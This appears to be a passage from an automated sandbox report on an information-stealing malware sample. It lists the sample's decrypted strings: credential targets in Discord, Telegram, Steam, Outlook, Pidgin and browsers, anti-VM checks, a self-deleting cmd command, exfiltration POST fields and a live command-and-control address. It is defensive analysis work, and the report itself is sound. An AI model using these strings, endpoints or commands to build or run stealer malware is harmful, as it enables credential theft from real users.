Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - CPU:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Threads:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Cores:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - RAM:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - Display Resolution:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: - GPU:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: User Agents:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Installed Apps:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: All Users:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Current User:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Process List:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: system_info.txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: nss3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \Temp\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: .exe
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: runas
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: open
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: /c start
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %DESKTOP%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %APPDATA%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %USERPROFILE%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %DOCUMENTS%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %RECENT%
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: *.lnk
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: files
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \discord\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \Telegram Desktop\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: key_datas
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: map*
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Telegram
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Tox
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: *.tox
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: *.ini
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Password
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 00000001
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 00000002
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 00000003
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: 00000004
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Pidgin
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \.purple\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: accounts.xml
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: token:
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Software\Valve\Steam
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SteamPath
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \config\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ssfn*
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: config.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DialogConfig.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: libraryfolders.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: loginusers.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \Steam\
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: browsers
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: done
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: soft
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: https
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: POST
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HTTP/1.1
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: hwid
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: build
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: token
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: file_name
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: file
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: message
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: screenshot.jpg
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Sleep
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: user32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ntdll.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sscanf
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: http://85.28.47.31
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: silence
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: /8405906461a5200c/
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: sila
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalLock
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HeapFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Process32Next
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: Process32First
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: LocalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FindClose
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: WriteFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetLastError
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: psapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SelectObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BitBlt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GdipFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetOpenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: StrStrA
Source: 44.2.48f0ec6733.exe.400000.0.unpack	String decryptor: StrCmpCW

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00418940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0040C660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00407280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00409B10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C596C80

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Unpacked PE file: 24.2.ee7a49fbf0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.65.39.112:443 -> 192.168.2.5:64195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:64197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64219 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64230 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64238 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64256 version: TLS 1.2
